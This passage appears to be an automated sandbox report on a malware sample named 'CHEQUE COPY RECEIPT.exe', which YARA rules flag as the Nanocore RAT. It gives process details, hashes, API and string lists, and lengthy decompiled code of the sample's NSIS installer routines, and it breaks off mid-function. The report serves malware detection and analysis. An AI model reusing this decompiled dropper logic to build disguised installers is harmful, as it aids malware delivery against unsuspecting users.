Source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6316 Parent PID: 3472

General

Start time:	08:17:47
Start date:	22/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0x400000
File size:	332470 bytes
MD5 hash:	403180100F3D966D4EA44C84D039A6D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 3888 Parent PID: 5580 CHEQUE COPY RECEIPT.exeCOMMON

Executed Functions

Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\alfons\\Desktop\\CHEQUE COPY RECEIPT.exe\" ";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\alfons\\Desktop\\CHEQUE COPY RECEIPT.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\CHEQUE COPY RECEIPT.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

0x00403496
0x0040349a
0x004034a2
0x004034a6
0x004034ab
0x004034b7
0x004034c0
0x004034c5
0x004034c8
0x004034cf
0x004034d6
0x004034d6
0x004034cf
0x004034d8
0x004034dd
0x004034de
0x004034ea
0x004034ee
0x004034f4
0x00403502
0x00403507
0x0040350e
0x00403512
0x00403516
0x00403518
0x00403518
0x00403516
0x00403520
0x00403527
0x0040352d
0x00403543
0x00403553
0x00403558
0x0040355e
0x00403565
0x00403571
0x0040357b
0x0040357d
0x0040357f
0x00403584
0x00403584
0x00403594
0x0040359a
0x00403663
0x00403663
0x00403665
0x00403667
0x00000000
0x00000000
0x004035a3
0x004035a6
0x004035ae
0x004035ae
0x004035b1
0x004035b6
0x004035b8
0x004035b8
0x004035b9
0x004035b9
0x004035be
0x004035c1
0x00403653
0x00403658
0x0040365d
0x00403660
0x00403662
0x00403662
0x00403662
0x00000000
0x004035c7
0x004035c7
0x004035c8
0x004035cb
0x004035e3
0x0040360e
0x00403610
0x00403623
0x0040364e
0x00403651
0x0040366f
0x00403672
0x0040367b
0x00403680
0x00403686
0x00403691
0x00403693
0x00403698
0x0040369a
0x004036f2
0x004036f7
0x00403701
0x00403708
0x0040370c
0x004037a0
0x004037a0
0x004037a5
0x004037ab
0x004037b0
0x004038d4
0x004038da
0x00403956
0x00403956
0x0040395b
0x0040395e
0x00403960
0x00403960
0x00403968
0x00403968
0x004038ea
0x004038f2
0x004038f4
0x004038f5
0x00403902
0x00403915
0x0040391d
0x00403921
0x00403921
0x00403929
0x0040392e
0x00403935
0x00403943
0x00403945
0x0040394b
0x0040394d
0x00000000
0x00000000
0x00000000
0x00403937
0x0040393d
0x0040393f
0x00403941
0x0040394f
0x00403951
0x00000000
0x00403951
0x00000000
0x00403941
0x00403935
0x004037bf
0x004037c6
0x004037c6
0x00403718
0x00403790
0x00403790
0x0040379c
0x00000000
0x0040379c
0x00403721
0x00403725
0x0040375b
0x0040375b
0x0040375d
0x00403765
0x004037d7
0x004037d9
0x004037e0
0x004037e8
0x004037e8
0x004037f3
0x004037f8
0x00403807
0x0040380b
0x0040380c
0x00403815
0x0040380e
0x0040380e
0x0040380e
0x0040381b
0x00403821
0x00403827
0x0040382f
0x0040382f
0x0040383d
0x00403842
0x00403854
0x0040385c
0x00403862
0x0040386e
0x00403874
0x0040387e
0x00403894
0x004038a5
0x004038ab
0x004038b2
0x004038b5
0x004038bb
0x004038bb
0x004038b2
0x004038bf
0x004038c5
0x004038c5
0x004038ca
0x004038ca
0x00000000
0x00403807
0x00403767
0x00403769
0x00403774
0x00000000
0x00000000
0x0040377c
0x00403787
0x0040378c
0x00000000
0x0040378c
0x00403750
0x00403752
0x00403756
0x00403759
0x00000000
0x00000000
0x00000000
0x00403759
0x00000000
0x00403752
0x004036a2
0x004036ae
0x004036b3
0x004036b8
0x004036ba
0x00000000
0x00000000
0x004036c2
0x004036ca
0x004036db
0x004036e3
0x004036e5
0x004036ea
0x004036ec
0x00000000
0x00000000
0x00000000
0x004036ec
0x00000000
0x00403651
0x00403612
0x00403615
0x00403618
0x0040361e
0x0040361e
0x0040361e
0x0040361e
0x00000000
0x0040361e
0x0040361a
0x0040361c
0x00000000
0x00000000
0x00000000
0x0040361c
0x004035cd
0x004035d0
0x004035d3
0x004035d9
0x004035d9
0x00000000
0x004035d9
0x004035d5
0x004035d7
0x00000000
0x00000000
0x00000000
0x004035d7
0x00000000
0x00000000
0x00000000
0x004035a8
0x004035a8
0x004035a8
0x004035a9
0x004035a9
0x00000000
0x004035a8
0x00000000

APIs

SetErrorMode.KERNEL32 ref: 004034AB
GetVersion.KERNEL32 ref: 004034B1
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
OleInitialize.OLE32(00000000), ref: 00403527
SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
CharNextA.USER32(00000000,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,00000020,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
DeleteFileA.KERNEL32(1033,?,00000007,00000009,0000000B), ref: 004036F7

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,7519FA90), ref: 00403B50
Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4

Part of subcall function 0040396E: CloseHandle.KERNEL32(0000029C,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
Part of subcall function 0040396E: CloseHandle.KERNEL32(00000290,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
ExitProcess.KERNEL32 ref: 004037C6
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
ExitWindowsEx.USER32 ref: 00403945
ExitProcess.KERNEL32 ref: 00403968

Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4

Strings

~nsu, xrefs: 004037D1
UXTHEME, xrefs: 004034D8, 004034DD, 004034E3
"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" , xrefs: 0040355E, 00403564, 0040371B
C:\Users\user\AppData\Local\Temp, xrefs: 00403676, 00403777, 00403821, 0040382A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040349A
", xrefs: 004035B9
Error launching installer, xrefs: 0040375D
NSIS Error, xrefs: 00403549
.tmp, xrefs: 004037ED
C:\Users\user\AppData\Local\Temp\, xrefs: 00403686, 0040368B, 004036A1, 004036AD, 004036BC, 004036C9, 004036D5, 004036DD, 004037D6, 004037E7, 004037F2, 004037FE, 0040380B, 0040381A, 004038C9
TMP, xrefs: 004036DE
Setup Setup, xrefs: 0040354E
C:\Users\user\Desktop, xrefs: 004037F8, 004037FD, 00403829
C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe, xrefs: 00403883
\Temp, xrefs: 004036A8
TEMP, xrefs: 004036D6
1033, xrefs: 004036F2
C:\Users\user\AppData\Local\Temp, xrefs: 00403782
SeShutdownPrivilege, xrefs: 004038FC
Low, xrefs: 004036C4

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 538718688-904531901
Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E

Uniqueness

Uniqueness Score: -1.00%

Function 73CA1A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E73CA1A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73CA1215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73CA1215();
				_t320 = E73CA123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E73CA12FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73CA1534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73ca2259) & 0x000000ff) * 4 +  &M73CA21CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73CA1224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
